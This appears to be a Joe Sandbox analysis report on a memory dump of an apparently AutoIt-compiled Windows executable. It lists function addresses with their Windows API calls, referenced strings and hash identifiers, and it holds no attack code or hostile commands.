Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 1d408d121f601613c2f284480233eaf5fb6e5a3ed5a3a03f1a184e85342eaa23
Instruction ID: 37c62cec3a6cbe88d8972d9188e22f3d5dd30ebca521a375a0b0eaf9ac8c5201
Opcode Fuzzy Hash: 1d408d121f601613c2f284480233eaf5fb6e5a3ed5a3a03f1a184e85342eaa23
Instruction Fuzzy Hash: CF615871A00248AFDB14DFA4CC81EEE77F8EB09710F144169FA14A72A1DB74AA55DF60

Function 0079710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00797135
SafeArrayAllocData.OLEAUT32(?), ref: 0079718E
VariantInit.OLEAUT32(?), ref: 007971A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 007971C0
VariantCopy.OLEAUT32(?,?), ref: 00797213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00797227
VariantClear.OLEAUT32(?), ref: 0079723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00797249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00797252
VariantClear.OLEAUT32(?), ref: 00797264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0079726F

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 8e515826af61692d50d6b64540ad19c13bc38ce89b427dbfedaa0a40d6f3e76e
Instruction ID: 4d286ee817964f5c8e68c46d4e7bcdc9bcf67acfeb8b373cb9e741d263aea7bc
Opcode Fuzzy Hash: 8e515826af61692d50d6b64540ad19c13bc38ce89b427dbfedaa0a40d6f3e76e
Instruction Fuzzy Hash: EE413D75A10219EFCF08DF64DC48DAEBBB9FF48354F00C069E915A7261DB38AA45CB90

Function 007B86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

CoInitialize.OLE32 ref: 007B8718
CoUninitialize.OLE32 ref: 007B8723
CoCreateInstance.OLE32(?,00000000,00000017,007D2BEC,?), ref: 007B8783
IIDFromString.OLE32(?,?), ref: 007B87F6
VariantInit.OLEAUT32(?), ref: 007B8890
VariantClear.OLEAUT32(?), ref: 007B88F1

Strings

Invalid parameter, xrefs: 007B880F
NULL Pointer assignment, xrefs: 007B87C8
Failed to create object, xrefs: 007B878E, 007B8844

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 1e22b381958521c19f7f59c500e01ce6f232b03aeea4f1a1c83b485c09d8141c
Instruction ID: bb3511a7a95ed869154db2e95034762c096fdc233b57cba39c7847dfd7e915aa
Opcode Fuzzy Hash: 1e22b381958521c19f7f59c500e01ce6f232b03aeea4f1a1c83b485c09d8141c
Instruction Fuzzy Hash: DE617A70608301EFD750DF64C848BAABBE8AF89714F14491DF9859B291DB78ED48CB93

Function 007B5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007B5AA6
inet_addr.WSOCK32(?), ref: 007B5AEB
gethostbyname.WSOCK32(?), ref: 007B5AF7
IcmpCreateFile.IPHLPAPI ref: 007B5B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B5B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B5B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 007B5C00
WSACleanup.WSOCK32 ref: 007B5C06

Strings

Ping, xrefs: 007B5B29

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8109bb38017b5a247a7b7a2a67074dc800d9835562a1eecddd19a0e87a3710ac
Instruction ID: a4d8fde6644ad48a2ae4c28e3979987c08991ea62bee27868c56caf97e35befd
Opcode Fuzzy Hash: 8109bb38017b5a247a7b7a2a67074dc800d9835562a1eecddd19a0e87a3710ac
Instruction Fuzzy Hash: 09516D71604B01DFDB10AF24CC89B6BBBE5EF48710F14892AF956DB2A1DB78E840CB55

Function 007AB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007AB7B1
GetLastError.KERNEL32 ref: 007AB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 007AB828

Strings

UNKNOWN, xrefs: 007AB7E0
READONLY, xrefs: 007AB7F3
NOTREADY, xrefs: 007AB7E7
INVALID, xrefs: 007AB7FA
READY, xrefs: 007AB801

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 7bbf5731df655c913d56af9304814f3aad466dbc5b1bafab2051090b7736f5d6
Instruction ID: 366c9d5519b0c0af4d4782a8de7edd590e99d5e3b179f170b2a6336675e21c07
Opcode Fuzzy Hash: 7bbf5731df655c913d56af9304814f3aad466dbc5b1bafab2051090b7736f5d6
Instruction Fuzzy Hash: A5318575A00209EFDB00EF64C885ABE7BB4EFC6750F14812AE505D7292DBB99941C791

Function 00799471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007994F6
GetDlgCtrlID.USER32 ref: 00799501
GetParent.USER32 ref: 0079951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00799520
GetDlgCtrlID.USER32(?), ref: 00799529
GetParent.USER32(?), ref: 00799545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00799548

Strings

ComboBox, xrefs: 0079947E
ListBox, xrefs: 007994B3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 9f442322ec5552cf052f44d96db22a8cd6a84f9bb05c1ebb2190b8c5ec9efc31
Instruction ID: 13c7c4f458d6d5ece8d55d014bec3a75ddfa385ff6a7f5a611b47205ccea3199
Opcode Fuzzy Hash: 9f442322ec5552cf052f44d96db22a8cd6a84f9bb05c1ebb2190b8c5ec9efc31
Instruction Fuzzy Hash: 0821B270A00108FBDF05AB64DC89EFEBB65EF49300F104119F661972E2DB7D5919DB20

Function 0079955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007995DF
GetDlgCtrlID.USER32 ref: 007995EA
GetParent.USER32 ref: 00799606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00799609
GetDlgCtrlID.USER32(?), ref: 00799612
GetParent.USER32(?), ref: 0079962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00799631

Strings

ComboBox, xrefs: 00799569
ListBox, xrefs: 0079959E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 786269c628f38623c0a2045fe9d4138de50d4683b81e7086e8f3f0098588a3c4
Instruction ID: 61be02d7d182cb77f4e31bcc8811686a4bf0c8fb3dec9e16a968d347cfc54180
Opcode Fuzzy Hash: 786269c628f38623c0a2045fe9d4138de50d4683b81e7086e8f3f0098588a3c4
Instruction Fuzzy Hash: 67217474A00108FBDF05AB64DC85EFEBB65EF54300F104159F651972A1DB7D9519DB20

Function 00799645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00799651
GetClassNameW.USER32(00000000,?,00000100), ref: 00799666
_wcscmp.LIBCMT ref: 00799678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007996F3

Strings

list, xrefs: 007996D5
SHELLDLL_DefView, xrefs: 00799672
largeicons, xrefs: 00799687
details, xrefs: 007996A1
smallicons, xrefs: 007996BB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 03dea3054a9ac53f397d589ae8a4856f69013279baa4a10fe608ef1ee7d5d163
Instruction ID: 4e28c8ebde6c5aa5e4028ef1cb43b49c1b8924f96b89d4f836a1ebeae301211d
Opcode Fuzzy Hash: 03dea3054a9ac53f397d589ae8a4856f69013279baa4a10fe608ef1ee7d5d163
Instruction Fuzzy Hash: 0311EC7624830BFAFE052628FC0BDB6779C9F05760F20012EFF11A51D1FE6E69618A58

Function 007A4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 007A419D
__swprintf.LIBCMT ref: 007A41AA

Part of subcall function 007638D8: __woutput_l.LIBCMT ref: 00763931

FindResourceW.KERNEL32(?,?,0000000E), ref: 007A41D4
LoadResource.KERNEL32(?,00000000), ref: 007A41E0
LockResource.KERNEL32(00000000), ref: 007A41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 007A420D
LoadResource.KERNEL32(?,00000000), ref: 007A421F
SizeofResource.KERNEL32(?,00000000), ref: 007A422E
LockResource.KERNEL32(?), ref: 007A423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007A429B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 8c3f90c5dc3182f30d2c9eafa91dd6fd5e08d9282ef1958c5c300706bf96f7aa
Instruction ID: 7bcd3418b59e150cf5e0062dab717042ebe7e058ce62e950bdc52afc62ef09bb
Opcode Fuzzy Hash: 8c3f90c5dc3182f30d2c9eafa91dd6fd5e08d9282ef1958c5c300706bf96f7aa
Instruction Fuzzy Hash: 4A317071A0521AAFDB119F60DC48EBF7BADFF85301F008629F905D2190E7B9DA51CBA4

Function 007A16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007A1700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,007A0778,?,00000001), ref: 007A1714
GetWindowThreadProcessId.USER32(00000000), ref: 007A171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0778,?,00000001), ref: 007A172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 007A173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0778,?,00000001), ref: 007A1755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0778,?,00000001), ref: 007A1767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007A0778,?,00000001), ref: 007A17AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007A0778,?,00000001), ref: 007A17C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007A0778,?,00000001), ref: 007A17CC

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 6b2d4320154f45d90a1b855353564e0f7147c955bcc3165f67b881a67a159e9b
Instruction ID: 13fae0d05dcc89b240274d51ba04582dd3a3696ee8f8f9b30a7280168205c307
Opcode Fuzzy Hash: 6b2d4320154f45d90a1b855353564e0f7147c955bcc3165f67b881a67a159e9b
Instruction Fuzzy Hash: 3831C175A00205BFEB119F24DC84F793BFAFB96761F508128F900D62A0DB78AD40CBA4

Function 007B9428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007B947C
VariantInit.OLEAUT32(?), ref: 007B954D
VariantInit.OLEAUT32(?), ref: 007B964E
VariantClear.OLEAUT32(?), ref: 007B9658
VariantClear.OLEAUT32(?), ref: 007B96B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 007B94DD, 007B960B, 007B96C3
Incorrect Object type in FOR..IN loop, xrefs: 007B9631
,,}, xrefs: 007B94FA

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,}$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-2286400513
Opcode ID: fbf5c45239de88bb2c8aac7bf8321391ce264e9f3f35214578c24e544bc473bc
Instruction ID: 3d7f4a184b86ffd4a45b69e8a88217d56815dfef92c09f807c263d383ae3ce5b
Opcode Fuzzy Hash: fbf5c45239de88bb2c8aac7bf8321391ce264e9f3f35214578c24e544bc473bc
Instruction Fuzzy Hash: 05918E71A00219ABDF24DFA5C848FEEB7B8EF45714F108159F729AB280D7789945CFA0

Function 0079A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0079AA64), ref: 0079A9A2

Strings

TEXT, xrefs: 0079A8D9
NAME, xrefs: 0079A7D4
REGEXPCLASS, xrefs: 0079A767
INSTANCE, xrefs: 0079A8B0
CLASSNN, xrefs: 0079A744
CLASS, xrefs: 0079A721

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 7594bd65ae70f96790c079c05bad04ce2bef632756a5efa4d75564d42b521479
Instruction ID: c1d162c2a5ba3cf0eff26e8d1d4021a2f4b17180c533e478482c39d7cee092fb
Opcode Fuzzy Hash: 7594bd65ae70f96790c079c05bad04ce2bef632756a5efa4d75564d42b521479
Instruction Fuzzy Hash: 77918070A0160AFBDF08DF60D486BE9FB74BF04314F508129E99AA7251DB387A59CBD1

Function 00742E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00742EAE

Part of subcall function 00741DB3: GetClientRect.USER32(?,?), ref: 00741DDC
Part of subcall function 00741DB3: GetWindowRect.USER32(?,?), ref: 00741E1D
Part of subcall function 00741DB3: ScreenToClient.USER32(?,?), ref: 00741E45

GetDC.USER32 ref: 0077CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0077CF95
SelectObject.GDI32(00000000,00000000), ref: 0077CFA3
SelectObject.GDI32(00000000,00000000), ref: 0077CFB8
ReleaseDC.USER32(?,00000000), ref: 0077CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0077D04B

Strings

U, xrefs: 0077CF20

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 07592c6984fddcdd8c5baf7c872e71a22c77df6d1be7eb185d0c8b20f235c15e
Instruction ID: 865c8e7b3bb46bb6d2d246e48e29557281d557f5b5f57e20298a446f1e5b0b31
Opcode Fuzzy Hash: 07592c6984fddcdd8c5baf7c872e71a22c77df6d1be7eb185d0c8b20f235c15e
Instruction Fuzzy Hash: D171C431500205DFCF219F64CC84ABA7BB6FF49390F14826EFD595A266D7398C62DB60

Function 007CC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

Part of subcall function 00742344: GetCursorPos.USER32(?), ref: 00742357
Part of subcall function 00742344: ScreenToClient.USER32(008067B0,?), ref: 00742374
Part of subcall function 00742344: GetAsyncKeyState.USER32(00000001), ref: 00742399
Part of subcall function 00742344: GetAsyncKeyState.USER32(00000002), ref: 007423A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007CC2E4
ImageList_EndDrag.COMCTL32 ref: 007CC2EA
ReleaseCapture.USER32 ref: 007CC2F0
SetWindowTextW.USER32(?,00000000), ref: 007CC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007CC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007CC48F

Strings

@GUI_DROPID, xrefs: 007CC3E1
@GUI_DRAGFILE, xrefs: 007CC424

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
